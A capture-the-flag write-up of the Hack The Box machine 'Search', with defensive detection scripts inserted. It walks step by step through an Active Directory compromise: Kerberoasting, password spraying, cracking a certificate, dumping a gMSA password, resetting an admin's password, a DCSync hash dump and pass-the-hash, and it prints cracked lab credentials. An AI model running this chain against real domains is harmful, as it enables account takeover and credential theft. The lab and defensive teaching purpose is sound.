Now some little information about the target we are dealing with. Bruh, relax man, I know it's hard, but guess what, it's fun at the end; it's all about trying harder, getting stuck and getting unstuck XD.
Now, since you know it's Windows and it's rated Hard, let's jump in already, so the hunt begins.
We always start with an nmap scan…
nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Tue Feb 8 07:33:58 2022 as: nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.11.129
Nmap scan report for 10.10.11.129
Host is up (0.39s latency).
Not shown: 65520 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
8172/tcp open unknown
49676/tcp open unknown
49699/tcp open unknown
49712/tcp open unknown
Read data files from: /usr/bin/../share/nmap
# Nmap done at Tue Feb 8 07:36:38 2022 -- 1 IP address (1 host up) scanned in 160.18 seconds
Let's throw some service detection and script switches at it to confirm what we have running on each port.
nmap -sC -sV -oN nmap/normal.tcp -p 80,53,135,139,389,443,445,464,593,636,3268,8172,49676,49712 10.10.11.129
# Nmap 7.91 scan initiated Tue Feb 8 07:38:49 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p 80,53,135,139,389,443,445,464,593,636,3268,8172,49676,49712 10.10.11.129
Nmap scan report for search.htb (10.10.11.129)
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-02-08T09:40:08+00:00; +2h59m35s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-02-08T09:40:08+00:00; +2h59m36s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-02-08T09:40:08+00:00; +2h59m36s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-02-08T09:40:10+00:00; +2h59m35s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
|_ssl-date: 2022-02-08T09:40:08+00:00; +2h59m36s from scanner time.
| tls-alpn:
|_ http/1.1
49676/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h59m35s, deviation: 0s, median: 2h59m34s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-02-08T09:39:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 8 07:40:35 2022 -- 1 IP address (1 host up) scanned in 105.95 seconds
That is a lot of ports, man, I know, but you are panicking already XD. Just kidding man. So we have HTTP, HTTPS, DNS, LDAP, SMB, etc. Don't know about you, but I am checking SMB first to see if we have access to any anonymous shares.
Now a dead end: seems we need credentials to see some shares on SMB. Just guessing really, but with a high hope of 90/10. Now let's check what we have on LDAP using ldapsearch.
ldapsearch -x -h 10.10.11.129 -s base namingcontexts
or
ldapsearch -H ldap://10.10.11.129 -x -s base namingcontexts
ldapsearch -x -h 10.10.11.129 -b 'DC=search,DC=htb'
or
ldapsearch -H ldap://10.10.11.129 -x -b "DC=search,DC=htb"
Ahhhh, nothing. Let's check what we have running on HTTP.
Seems like a normal static page, but guess what, we found the domain, so we can easily add it to the /etc/hosts file using echo "10.10.11.129 search.htb" >> /etc/hosts
Now we are good, let's brute-force some directories using gobuster.
/index.html (Status: 200) [Size: 44982]
/images (Status: 301) [Size: 148] [--> http://search.htb/images/]
/main.html (Status: 200) [Size: 931]
/Images (Status: 301) [Size: 148] [--> http://search.htb/Images/]
/staff (Status: 403) [Size: 1233]
/css (Status: 301) [Size: 145] [--> http://search.htb/css/]
/Index.html (Status: 200) [Size: 44982]
/js (Status: 301) [Size: 144] [--> http://search.htb/js/]
/Main.html (Status: 200) [Size: 931]
/Staff (Status: 403) [Size: 1233]
/fonts (Status: 301) [Size: 147] [--> http://search.htb/fonts/]
/IMAGES (Status: 301) [Size: 148] [--> http://search.htb/IMAGES/]
/INDEX.html (Status: 200) [Size: 44982]
/Fonts (Status: 301) [Size: 147] [--> http://search.htb/Fonts/]
/single.html (Status: 200) [Size: 19559]
/*checkout* (Status: 400) [Size: 3420]
Found only the staff directory, but when I try to access it I get access denied.
Now back to the homepage to check if we missed anything.
And it seems so: we missed a slide that has scheduled activities, let's zoom in on it.
Seems I am right, a username and a password, I guess.
Name: Hope Sharp
Password: IsolationIsKey?
But it's just a name, not really a username. Not to worry, we can use BridgeKeeper to generate usernames from the name we have, or do it manually.
Now let's feed it to crackmapexec.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ crackmapexec smb search.htb -u usersnames.txt -p 'IsolationIsKey?' --continue-on-success
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hsharp:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hopes:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\h.sharp:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hope.s:IsolationIsKey? STATUS_LOGON_FAILURE
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
Boom, we found the username, now let's access some SMB shares.
Now we have some shares to enumerate, let's go through them.
Boom, more users. Going through the shares got us nothing, but since we have valid credentials, let me break it down.
If you compromise a user that has a valid Kerberos ticket-granting ticket (TGT), then you can request one or more ticket-granting service (TGS) service tickets for any Service Principal Name (SPN) from a domain controller. An example SPN would be the Application Server shown in the above figure.
A portion of the TGS ticket is encrypted with the hash of the service account associated with the SPN. Therefore, you can run an offline brute-force attack on the encrypted portion to reveal the service account password. So, if you request a TGS ticket for an administrator account and that administrator is using a weak password, we'll be able to crack it!
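From the blue-team side, this technique has a very recognisable footprint on the domain controller. Here is an added example (my own code, not from this writeup or any tool it uses) that runs a simple Kerberoasting detection over constructed Security event 4769 (TGS request) records: one account requesting RC4 tickets (etype 0x17, the "etype 23" John reports further down) for several user-account SPNs within a few minutes. The flattened log format, the account names, the client IPs and the thresholds are all assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4769 records, flattened to key=value lines for the
# example. Real events are XML/EVTX; only these five fields are needed here.
SAMPLE_4769 = """\
2022-02-08T09:40:01 account=hope.sharp@SEARCH.HTB service=web_svc etype=0x17 client=10.10.14.7
2022-02-08T09:40:02 account=hope.sharp@SEARCH.HTB service=sql_svc etype=0x17 client=10.10.14.7
2022-02-08T09:40:02 account=hope.sharp@SEARCH.HTB service=http_svc etype=0x17 client=10.10.14.7
2022-02-08T09:40:03 account=hope.sharp@SEARCH.HTB service=RESEARCH$ etype=0x12 client=10.10.14.7
2022-02-08T09:41:10 account=edgar.jacobs@SEARCH.HTB service=RESEARCH$ etype=0x12 client=10.10.11.50
2022-02-08T09:41:11 account=edgar.jacobs@SEARCH.HTB service=krbtgt etype=0x12 client=10.10.11.50
2022-02-08T10:05:00 account=sierra.frye@SEARCH.HTB service=web_svc etype=0x12 client=10.10.11.51
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) account=(?P<account>\S+) service=(?P<service>\S+) "
    r"etype=(?P<etype>0x[0-9a-fA-F]+) client=(?P<client>\S+)$"
)
RC4_HMAC = 0x17  # Kerberos etype 23; AES tickets are 0x11 / 0x12


def parse_4769(text):
    """Turn the constructed key=value lines into event dicts with typed fields."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not have the expected shape
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        ev["etype"] = int(ev["etype"], 16)
        events.append(ev)
    return events


def is_roastable_service(service):
    """Only tickets for user-account SPNs matter: computer accounts ($) and krbtgt have
    long random passwords and are requested constantly by normal logons."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def find_kerberoast_candidates(events, window=timedelta(minutes=5), min_services=2):
    """Flag accounts that obtained RC4 tickets for >= min_services distinct user SPNs
    inside any window-long span. Returns {account: {services, clients, first_seen}}."""
    by_account = defaultdict(list)
    for ev in events:
        if ev["etype"] == RC4_HMAC and is_roastable_service(ev["service"]):
            by_account[ev["account"]].append(ev)
    findings = {}
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e["ts"] - start["ts"] <= window]
            services = sorted({e["service"] for e in in_window})
            if len(services) >= min_services:
                findings[account] = {
                    "services": services,
                    "clients": sorted({e["client"] for e in in_window}),
                    "first_seen": start["ts"].isoformat(),
                }
                break  # one finding per account is enough to raise an alert
    return findings


if __name__ == "__main__":
    for account, hit in find_kerberoast_candidates(parse_4769(SAMPLE_4769)).items():
        print(f"[!] possible Kerberoasting by {account} from {hit['clients']}: {hit['services']}")
```

The single AES ticket sierra.frye requests for web_svc is deliberately not flagged: a user SPN being requested once with a modern etype is just a service being used. What stands out is one account asking for RC4 tickets to many user SPNs in seconds. The mitigations that go with this are long random passwords on SPN accounts (or gMSAs, which the box itself uses for BIR-ADFS-GMSA) and disabling RC4 for those accounts so the ticket is not crackable offline in the first place.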
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -dc-ip 10.10.11.129 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 13:59:11.329031 <never>
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
If you get this error on Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great), it's because of your local time. Kerberos only tolerates about five minutes of difference by default, and the nmap output above already showed a clock skew of almost three hours, so you need to synchronise your host with the DC: ntpdate <IP of DC>
Boom, we were able to request a TGS ticket containing a hash for the web_svc user. Let's try to crack the hash using John the Ripper.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
No password hashes left to crack (see FAQ)
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ john --show hash.txt
?:@3ONEmillionbaby
1 password hash cracked, 0 left
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
Now that we have a password, let's try password reuse on the usernames we have; yes, I mean spraying it with crackmapexec, maybe another user is using the same password.
Now let's hit it with crackmapexec.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ crackmapexec smb search.htb -u users.txt -p @3ONEmillionbaby --continue-on-success
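A spray like this is loud on the domain controller: one source tries one password against many accounts in a couple of seconds, and the interesting signal is a success (4624) sitting in the middle of a burst of failures (4625). Here is an added example (my own code, not from the writeup or crackmapexec) that runs that detection over constructed logon records. The flattened log format, the source IPs and the thresholds are assumptions for the example; the NTSTATUS code 0xC000006A is the real "wrong password" status.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed logon records (not real DC logs), flattened to key=value lines:
# event 4625 = failed logon, 4624 = successful logon, status = NTSTATUS of the attempt.
SAMPLE_LOGONS = """\
2022-02-08T11:02:00 event=4625 user=hope.sharp src=10.10.14.7 status=0xC000006A
2022-02-08T11:02:00 event=4625 user=edgar.jacobs src=10.10.14.7 status=0xC000006A
2022-02-08T11:02:01 event=4625 user=sierra.frye src=10.10.14.7 status=0xC000006A
2022-02-08T11:02:01 event=4625 user=tristan.davies src=10.10.14.7 status=0xC000006A
2022-02-08T11:02:02 event=4624 user=web_svc src=10.10.14.7 status=0x0
2022-02-08T11:02:02 event=4625 user=administrator src=10.10.14.7 status=0xC000006A
2022-02-08T11:30:00 event=4625 user=sierra.frye src=10.10.11.51 status=0xC000006A
2022-02-08T11:30:20 event=4624 user=sierra.frye src=10.10.11.51 status=0x0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) event=(?P<event>\d+) user=(?P<user>\S+) src=(?P<src>\S+) status=(?P<status>\S+)$"
)


def parse_logons(text):
    """Parse the constructed lines into event dicts with a datetime and an int event id."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        ev["event"] = int(ev["event"])
        events.append(ev)
    return events


def find_password_sprays(events, window=timedelta(minutes=10), min_accounts=4):
    """Per source address: if failures against >= min_accounts distinct users fall inside
    one window, report the failed accounts and any account that succeeded from the same
    source inside that window (the credential the spray found)."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["event"] == 4625]
        for i, start in enumerate(failures):
            end = start["ts"] + window
            failed = sorted({e["user"] for e in failures[i:] if e["ts"] <= end})
            if len(failed) < min_accounts:
                continue
            succeeded = sorted({e["user"] for e in evs
                                if e["event"] == 4624 and start["ts"] <= e["ts"] <= end})
            findings[src] = {
                "failed_accounts": failed,
                "succeeded_accounts": succeeded,
                "first_seen": start["ts"].isoformat(),
            }
            break  # one finding per source is enough for an alert
    return findings


if __name__ == "__main__":
    for src, hit in find_password_sprays(parse_logons(SAMPLE_LOGONS)).items():
        print(f"[!] spray from {src}: {len(hit['failed_accounts'])} accounts failed, "
              f"succeeded: {hit['succeeded_accounts']}")
```

The second source (one failure for sierra.frye followed by a success twenty seconds later) is a user mistyping a password and is not reported. Keying on distinct usernames per source rather than on failures per account is what separates a spray from ordinary lockout noise, and it is also why a spray stays under per-account lockout thresholds unless you alert on it this way.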
Now we can use it to access SMB.
Now let's see what we can get in the SMB shares as the user edgar.jacobs.
Boom, we have an xlsx file, let's download it to our attacking machine. When I opened the file, it contains first name, last name and username. There is also a protected cell named password which is hidden; let's see how we can recover that.
Let's go through a few tricks we can use to recover a protected cell.
Let's make a copy of the document and rename the file from Phishing_Attempt.xlsx to Phishing_Attempt.zip.
After that let's unzip it and we should have a folder.
Now locate the xl folder, then the worksheets folder inside it, and open the sheet2.xml file.
Now remove the sheetProtection tag and save the file.
Rename Phishing_Attempt.zip back to Phishing_Attempt.xlsx, and when you open the file you should now be able to read the password cell.
A quick notice: I was able to perform this process using a Windows machine; Linux kept giving me gibberish.
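The reason this trick works is worth spelling out: an xlsx is a zip of XML parts, and "sheet protection" is just a sheetProtection element with a hash of the protection password; the cell contents next to it are stored in clear. Only a password-to-open workbook is actually encrypted, and that one is not a zip at all but an OLE container. Here is an added example (my own code, not from the writeup) that builds a tiny constructed workbook with a protected sheet and a hidden column, then audits it without modifying anything, reporting which case a file falls into and which strings are readable as plaintext. The workbook contents, the placeholder hash values and the example password string are all constructed for the demo.

```python
import io
import re
import zipfile

# Office Open XML workbooks are plain zip archives. A password-to-open workbook is instead
# wrapped in an OLE/CFB container whose first eight bytes are this signature.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
SHEET_PROTECTION_RE = re.compile(r"<sheetProtection\b[^>]*>")
HIDDEN_COL_RE = re.compile(r'<col\b[^>]*\bhidden="1"[^>]*>')
SHARED_STRING_RE = re.compile(r"<t[^>]*>([^<]*)</t>")


def build_sample_workbook():
    """Construct a minimal workbook-like archive for the example (NOT the box's file).
    Real Excel files carry more parts ([Content_Types].xml, rels, workbook.xml); only the
    parts this audit reads are included. The hash and salt values are placeholders."""
    shared = ('<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
              '<si><t>Username</t></si><si><t>Password</t></si>'
              '<si><t>example.user</t></si><si><t>Example-Passw0rd!</t></si></sst>')
    sheet2 = ('<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
              '<sheetProtection algorithmName="SHA-512" hashValue="PLACEHOLDER" '
              'saltValue="PLACEHOLDER" spinCount="100000" sheet="1"/>'
              '<cols><col min="2" max="2" width="0" hidden="1"/></cols>'
              '<sheetData><row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>1</v></c></row>'
              '<row r="2"><c r="A2" t="s"><v>2</v></c><c r="B2" t="s"><v>3</v></c></row>'
              '</sheetData></worksheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/sharedStrings.xml", shared)
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        z.writestr("xl/worksheets/sheet2.xml", sheet2)
    return buf.getvalue()


def audit_workbook(data):
    """Classify a workbook: truly encrypted (OLE wrapper), or a plain zip whose sheets carry
    sheetProtection / hidden columns while every cell string sits in clear text."""
    report = {"container": "unknown", "protected_sheets": [], "hidden_columns": [], "plaintext_strings": []}
    if data.startswith(OLE_MAGIC):
        report["container"] = "ole-encrypted"  # password-to-open: contents are really encrypted
        return report
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return report
    report["container"] = "zip"
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        for name in names:
            if not name.startswith("xl/worksheets/"):
                continue
            xml = z.read(name).decode("utf-8")
            if SHEET_PROTECTION_RE.search(xml):
                report["protected_sheets"].append(name)
            report["hidden_columns"].extend(f"{name}: {tag}" for tag in HIDDEN_COL_RE.findall(xml))
        if "xl/sharedStrings.xml" in names:
            report["plaintext_strings"] = SHARED_STRING_RE.findall(z.read("xl/sharedStrings.xml").decode("utf-8"))
    return report


if __name__ == "__main__":
    result = audit_workbook(build_sample_workbook())
    print(f"container: {result['container']}")
    print(f"protected sheets: {result['protected_sheets']}")
    print(f"hidden columns: {result['hidden_columns']}")
    print(f"strings readable without any password: {result['plaintext_strings']}")
```

The takeaway for whoever produced the spreadsheet is that a protected, hidden column is a tidiness feature, not a confidentiality control: the strings come out of sharedStrings.xml with nothing removed. If a workbook has to carry secrets at all, password-to-open (which the audit reports as ole-encrypted) is the only Excel option that actually encrypts, and a password manager is the better answer.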
Now that we have more credentials, let's spray them again on SMB using crackmapexec XD.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ crackmapexec smb search.htb -u users.txt -p pass.txt --continue-on-success
Ahhh yes, let's use it to access the SMB share again and see what we can get.
Now that we are in, let's check sierra.frye's desktop.
Boom, we have user.txt.
Finally, going through the rest of the dirs, we found a backups folder which contains certificate files. After some time doing research, I found out this certificate can be imported into the browser and used by some domains. Trying to import the certificate requires a password. I used crackpkcs12 to crack the password and imported the certificate successfully.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ crackpkcs12 -d /usr/share/wordlists/rockyou.txt staff.pfx -t 10
Dictionary attack - Starting 10 threads
*********************************************************
Dictionary attack - Thread 4 - Password found: misspissy
*********************************************************
Now that we cracked it and have the password, back to https://search.htb/staff/ where we know we can import the certificate file in our browser.
Import the staff.pfx certificate file; it will ask for a password, which we already have, so just input it and we are good to go. Let's refresh the page.
Click on OK and boom.
Windows PowerShell Web Access. Let's use the credentials we have, which are for sierra.frye.
Now we should have a PowerShell console ready for us after login.
Now the headache: I tried everything to get a reverse shell back to our terminal, but damn man, the AV keeps deleting our files, even the sharphound.exe I uploaded. So since we have valid credentials, let's use bloodhound-python, which we can easily install with pip3 install bloodhound.
bloodhound-python -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -ns 10.10.11.129 -d search.htb -c all
So let's give it time; after some minutes we get the JSON files.
Now we can easily use the BloodHound GUI to import all the JSON files. Let's start it.
sudo neo4j console
Now let's start the GUI.
./BloodHound --no-sandbox
So I searched for the user we currently have access to and marked it as owned.
Select Analysis, under Pre-Built Analytics Queries click on Shortest Paths to Domain Admins from Owned Principals, and we should have the diagram below.
The user SIERRA.FRYE@SEARCH.HTB is a member of the group BIRMINGHAM-ITSEC@SEARCH.HTB. Groups in Active Directory grant their members any privileges the group itself has. If a group has rights to another principal, users/computers in the group, as well as other groups inside the group, inherit those permissions.
So we know the path is sierra.frye -> ITSEC@search.htb -> BIR-ADFS-GMSA@search.htb -> tristan.davies -> Domain Admins, right, which should be easy for us to abuse.
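What the BloodHound query does under the hood is a shortest-path search over the edges the collector found, and the defensive use of the same graph is asking which single edge you would remove to break the chain. Here is an added example (my own code, not from the writeup or from BloodHound) that rebuilds the relationships this writeup names as an edge list, runs a breadth-first search from the owned principal to Domain Admins, and lists the chokepoint edges. The HOPE.SHARP membership in Domain Users is a constructed edge added so that the no-path case is visible; no group nesting beyond what the page states is assumed.

```python
from collections import defaultdict, deque

# Edges (source, right, target) reconstructed from the relationships named in the writeup,
# plus one constructed low-privilege user with no path so the negative case is visible.
EDGES = [
    ("SIERRA.FRYE@SEARCH.HTB", "MemberOf", "BIRMINGHAM-ITSEC@SEARCH.HTB"),
    ("SIERRA.FRYE@SEARCH.HTB", "MemberOf", "ITSEC@SEARCH.HTB"),
    ("ITSEC@SEARCH.HTB", "ReadGMSAPassword", "BIR-ADFS-GMSA@SEARCH.HTB"),
    ("BIR-ADFS-GMSA@SEARCH.HTB", "GenericAll", "TRISTAN.DAVIES@SEARCH.HTB"),
    ("TRISTAN.DAVIES@SEARCH.HTB", "MemberOf", "DOMAIN ADMINS@SEARCH.HTB"),
    ("HOPE.SHARP@SEARCH.HTB", "MemberOf", "DOMAIN USERS@SEARCH.HTB"),  # constructed
]
DOMAIN_ADMINS = "DOMAIN ADMINS@SEARCH.HTB"


def build_graph(edges):
    """Adjacency list: node -> [(right, target), ...]."""
    graph = defaultdict(list)
    for src, right, dst in edges:
        graph[src].append((right, dst))
    return graph


def shortest_path(edges, start, goal):
    """Breadth-first search; returns the hop list [(src, right, dst), ...] or None."""
    graph = build_graph(edges)
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for right, nxt in graph[node]:
            if nxt not in prev:
                prev[nxt] = (node, right)
                queue.append(nxt)
    if goal not in prev:
        return None
    hops, node = [], goal
    while prev[node] is not None:
        parent, right = prev[node]
        hops.append((parent, right, node))
        node = parent
    return hops[::-1]


def paths_from_owned(edges, owned, goal=DOMAIN_ADMINS):
    """The BloodHound question: which owned principals reach Domain Admins, and how."""
    return {principal: shortest_path(edges, principal, goal) for principal in owned}


def chokepoints(edges, start, goal=DOMAIN_ADMINS):
    """Edges whose removal alone disconnects start from goal: the cheapest fixes, e.g.
    trimming the ReadGMSAPassword grant or the GenericAll ACE on the admin account."""
    return [e for e in edges
            if shortest_path([x for x in edges if x != e], start, goal) is None]


def render(path):
    """Human-readable form of a hop list."""
    if not path:
        return "(no path)"
    return " ".join(f"{src} -[{right}]->" for src, right, _ in path) + f" {path[-1][2]}"


if __name__ == "__main__":
    owned = ["SIERRA.FRYE@SEARCH.HTB", "HOPE.SHARP@SEARCH.HTB"]
    for principal, path in paths_from_owned(EDGES, owned).items():
        print(f"{principal}: {render(path)}")
    for edge in chokepoints(EDGES, "SIERRA.FRYE@SEARCH.HTB"):
        print(f"cut candidate: {edge}")
```

Every edge on the four-hop chain comes back as a chokepoint because there is only one route, while the BIRMINGHAM-ITSEC membership does not, since the direct ITSEC membership still carries the path. In a real domain the interesting output is the edges that are cheap to remove: a gMSA whose msDS-GroupMSAMembership lists a broad helpdesk group, or a service account holding GenericAll over a Domain Admin, is a misconfiguration, not a requirement.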
ReadGMSAPassword
BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can retrieve the password for the GMSA BIR-ADFS-GMSA@SEARCH.HTB.
Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is managed by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).
The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.
Which we can easily abuse now: since sierra.frye is a member of the ITSEC@search.htb group, this user has all the group's permissions. We can easily use gMSADumper on our attacking machine to do that.
python3 gMSADumper.py -d search.htb -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Now that we have the GMSA hash, let's check the next step.
GenericAll
The user BIR-ADFS-GMSA@SEARCH.HTB has GenericAll privileges to the user TRISTAN.DAVIES@SEARCH.HTB.
This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.
Since we know this account has GenericAll privileges over tristan.davies, and we don't know Tristan's password, I proceed to reset his password using rpcclient with the bir-adfs-gmsa account and the obtained hash.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ rpcclient -U bir-adfs-gmsa$ -W search.htb search.htb --pw-nt-hash
Enter SEARCH.HTB\bir-adfs-gmsa$'s password:
rpcclient $> setuserinfo2 tristan.davies 23 'password'
rpcclient $>
Now we have successfully changed tristan.davies's password.
The user TRISTAN.DAVIES@SEARCH.HTB is a member of the group DOMAIN ADMINS@SEARCH.HTB. Groups in Active Directory grant their members any privileges the group itself has. If a group has rights to another principal, users/computers in the group, as well as other groups inside the group, inherit those permissions.
Since we know tristan.davies is a member of Domain Admins, we can easily dump all the hashes.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ secretsdump.py search.htb/tristan.davies:password@10.10.11.129 -just-dc
Let it rain hashes XD. Now that we have the administrator's hash, we can easily use Pass-the-Hash to get access to the target and grab the root.txt flag.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6 administrator@search.htb
We are done. Boom, hope you had fun.
A quick notice: I was unable to get a proper cmd shell or PowerShell since we kept getting blocked by the AV. Would really love to know if anyone finds another way to get a proper shell. Peace out.
Greetings from Muzec.